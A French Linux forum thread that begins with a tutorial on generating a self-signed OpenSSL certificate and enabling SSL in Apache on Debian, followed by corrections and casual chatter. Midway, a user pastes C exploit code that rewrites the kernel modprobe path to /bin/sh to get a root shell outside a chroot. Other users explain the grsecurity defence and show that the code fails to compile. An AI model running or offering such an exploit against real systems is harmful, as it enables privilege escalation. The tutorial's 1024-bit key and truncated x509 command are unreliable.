Création d'un certificat auto-signé sous Debian

Voici un tuto compilé d'après différent site internet
Pour utiliser le SSL et créer un certificat sous Debian, vous devez installer les paquets suivants avec aptitude :
$# openssl, ssl-cert et libssl0.9.8

Nous allons ensuite nous placer dans le répertoire d'Apache 2 (/etc/apache2) pour générer le certificat au bon endroit :
$# cd /etc/apache2

Création de la clé privée RSA :

Cette commande va vous permettre de générer une clé RSA :
$# openssl genrsa -out server.key 1024

Génération d'un certificat auto-signé : Attention : Si le certificat est auto-signé, les versions récentes de Firefox et IE préviennent le client que le certificat n'a pas été créé par un organisme de certification. La certification d'un site SSL par un organisme, est très coûteuse,c'est pourquoi cette opération ne s'adresse pas aux particuliers mais uniquement aux sites de vente en ligne.A partir de la clé de tout à l'heure, vous allez pouvoir créer un certificat générique pour votre
organisme :
$# openssl req -new -key server.key -out server.csr

Vous devrez répondre ensuite aux questions qui permettront d'identifier votre organisme :
– Code de pays
– État
– Ville
– Entreprise
– Section de l'entreprise
– Nom du responsable du site sécurisé
– e-mail du responsable

Enfin, vous allez pouvoir créer le certificat utilisable par les visiteurs au format x509 pour une
certaine durée (dans cet exemple 1 an) :
$# openssl x509 -req -days 365 -in server.csr -signkey server.key -out


II- Activation d'un site sécurisé sous Apache :

Activer le SSL dans Apache 2 :

Pour avoir la liste complête des modules de Apache 2, on peut faire :
$# ls /etc/apache2/mods-available

Pour activer un module de Apache 2 on utilise la commande a2enmod. Le SSL est peut être déjà activé mais pour le vérifier on peut taper :
$# a2enmod ssl

Modification des ports d'écoute : Vérifiez dans le fichier /etc/apache2/ports.conf si il existe le port 443 pour le module SSL. Si ce n'est pas le cas, vous pouvez ajouter une ligne :
Listen 443

Nouveau site virtuel : Créez un nouveau site virtuel (fichier dans /etc/apache2/sites-available/ ). Dans ce fichier vous pouvez écrire les lignes suivantes :

############debut script#########################
NameVirtualHost www.votreserveur.com:443
<VirtualHost www.votreserveur.com:443>
DocumentRoot /var/www/repduserveur
ServerName www.votreserveur.com
<Directory /var/www/repduserveur>
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from all
</Directory>
SSLEngine on
SSLCertificateFile /etc/apache2/server.crt
SSLCertificateKeyFile /etc/apache2/server.key
</VirtualHost>
############debut script#########################

Redémarrage et test : Il ne reste qu'à recharger le serveur Apache :
$# /etc/init.d/apache2 reload

Pour tester ce serveur sécurisé, vous pouvez aller sur :
https://www.votreserveur.com/

Vous devriez avoir un avertissement car ce certificat est auto-signé. Vérifiez le contenu du certificat. Vérifiez par une analyse de trame que les informations ne sont pas lisibles.

à toi SuperTuX pour confirmation du tuto

supertux alias masao?

YannB a écrit:

supertux alias masao? Very Happy

C'est supermario, moi, pas superman...



Quelques remarques :
* « $# » ? C'est quoi ce prompt ?
* Pas besoin de polluer /etc/apache2 quand on a des dossiers fait pour : /etc/ssl/certs pour les certificats et /etc/ssl/private pour les clés.
* Il faut bien faire attention quand on génère la clé, à donner comme nom de l'entreprise (Common Name) l'adresse du site.
* Si tu gardes le site par défaut sur /var/www sans SSL, il ne faut pas mettre ton site SSL dans /var/www/monsite mais ailleurs (en supposant que si tu fais du SSL, c'est pour que ton site ne soit pas public !).

Pour aller plus loin :
* Quelques liens utiles :
- http://www.grandville.net/pmwiki.php/OpenSSL/LigneDeCommande (surtout la partie 3 - commandes utiles)
- http://www.madboa.com/geek/openssl (oui, tu peux créer la clé et le certificat en une seule commande )
* Pour faire de l'authentification avec certificats clients, il faut se créer une autorité de certification (CA) perso
- soit en se tapant la conf d'openssl (je laisse l'exercice à ceux qui auront le courage )
- soit en utilisant le script CA.pl fourni avec openssl : http://postfix.traduc.org/index.php/TLS_README.html#quick-start
- soit en utilisant l'utilitaire graphique TinyCA : http://irp.nain-t.net/doku.php/270crypt:030_application
(on peut aussi faire appel à des CA gratuites comme http://www.cacert.org )

Merci pour les corrections, mais j'aurais voulu avoir des précisions sur le répertoire /monsite.
Quels sont les droits d'accès sur le répertoire ?

Ben, au niveau des droits Unix, il faut donner les droits suffisants à l'utilisateur apache (www-data sous debian).
Au niveau de apache, en gros il faut définir les droits pour les connexions anonymes, et si authentifications les droits pour les utilisateurs authentifiés...

Après, les droits que tu donnes dépendent du site que tu héberges.

c 'est la valeur par défaut, l'idéal serait 2048 comme ils font ici.

PS : massao tu serai content de bosser ici ya que des linuxiens aguéris !

C jo qui serait pas content le nombre de troll windaube par jour, j'en deviens ouf !

@ plus

Bah, si ils cherchent quelqu'un pour Octobre...

Salut grep,

ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !

C la merde pour moi ils me demandent des trucs trop hard core !

en fait on de ledi avec des groupes auto, Je dois avec un autre type faire un traducteur de document (BC, facture) en php!

G acheté 3 bouquins ! :p

lol mo² , tu vas trimer sévère

je trime mais heureusment que la communauté des linuxiens est sympa, ils m'aident beaucoup c chiens dla casse !

Mais bon on a su résister à Denis, ...

t'as envoyé un mail a jean-christophe pastaga pour avoir de l'aide ?

lol il c meme pa se ou est caché son zizi !

Ce guignol recherche encore comment pingué sonr srv !

m0m0du78 a écrit:

ca devrait pouvoir se faire d'autant que toi t un bon en dev pyhton et php !

C'est saami qui fait du python et du php. Moi je connais que bash et perl...

mOmOdu78 a écrit:

Je dois avec un autre type faire un traducteur de document (BC, facture) en php!

admin, développeur, traducteur... Tu fais le ménage aussi à la fin ?

euh s il me paye pour ca pkoi pas ?

je suis pas seul sur le dev !

fo dire que g un peu mitonné sur mes compétences mais sa devrait le faire ...

g un code qui casse les couilles à l'admin sys : #include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <linux/sysctl.h>
#include <sys/socket.h>

_syscall1(int, _sysctl, struct __sysctl_args *, args);
int sysctl(int *name, int nlen, void *oldval, size_t *oldlenp,
void *newval, size_t newlen)
{
struct __sysctl_args args={name,nlen,oldval,oldlenp,newval,newlen};
return _sysctl(&args);
}

#define SIZE(x) sizeof(x)/sizeof(x[0])
#define MODPROBEPATHLEN 256

char modprobepath[MODPROBEPATHLEN];
int pathlen;
int name[] = { CTL_KERN, KERN_MODPROBE };

int main(void){
strcpy(modprobepath, "/bin/sh");
pathlen = SIZE(modprobepath);
if (sysctl(name, SIZE(name), 0, NULL, modprobepath, pathlen))
perror("sysctl");
else {
printf("successfully modified the modprobe path.\n");
socket(AF_SECURITY, SOCK_STREAM, 1);
printf("executing shell with full privileges, outside of chroot\n");
}
return 0;

regarde un peu cette bombe !

Quand le noyau force l'exécution d'un binaire, dans une prison, celui-ci est exécuté avec le vrai système de fichiers racine en tant que racine du nouveau processus.

Pour stopper cela, grsecurity empêche les écritures via sysctl(), mais aussi via le procfs.

ah ah je te rassure c po moi qui est trouvé ça mais j'ai marqué des points auprès du tollier quand g copé collé cette soluce !!

Savoir fouiner c'est parfois plus utile que savoir faire...

hallah wackba

Wé on sait, le C c'est fort, y'a des pointeurs...


Ça compile pas chez moi ton truc. Je l'ai copié dans un fichier test.c :

Code:

$ make test
cc    test.c  -o test
test.c:8: error: expected declaration specifiers or ‘...’ before ‘_sysctl’
test.c:8: error: expected declaration specifiers or ‘...’ before ‘args’
test.c:8: warning: data definition has no type or storage class
test.c: In function ‘main’:
test.c:33: error: expected declaration or statement at end of input
make: *** [test] Erreur 1

Pour info :

Code:

$ gcc -v
Utilisation des specs internes.
COLLECT_GCC=cc
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configuré avec: ../configure --prefix=/usr --enable-languages=c,c++,fortran,objc,obj-c++,ada --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-gnu-unique-object --enable-lto --enable-plugin --disable-multilib --disable-libstdcxx-pch --with-system-zlib --with-ppl --with-cloog --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info
Modèle de thread: posix
gcc version 4.5.0 20100610 (prerelease) (GCC)

Bon, en fait, tout ce que je voulais savoir, c'est si il fallait être root pour pouvoir sortir du chroot avec ton truc...

pas besoin d etre root, le bordel exploite une partie d adress mem ou nimporte qui a accès en écriture .

eeeuuu tu as dit pointeur ?

je ve pa aller en prison !

m0m0du78 a écrit:

je ve pa aller en priison !

Ben te vantes pas de savoir en sortir alors...

Surtout que bon, tu ne t'échapperas pas d'une prison moderne :

man _syscall a écrit:

CONFORMING TO
The use of these macros is Linux-specific, and deprecated.

NOTES
Starting around kernel 2.6.18, the _syscall macros were removed from header files supplied to user space. Use syscall(2) instead. (Some architec‐
tures, notably ia64, never provided the _syscall macros; on those architectures, syscall(2) was always required.)

Je pouvais toujours m'acharner pour compiler avec un kernel 2.6.34 (sans compter que tu as sauté la dernière accolade fermante en copiant-collant le code) !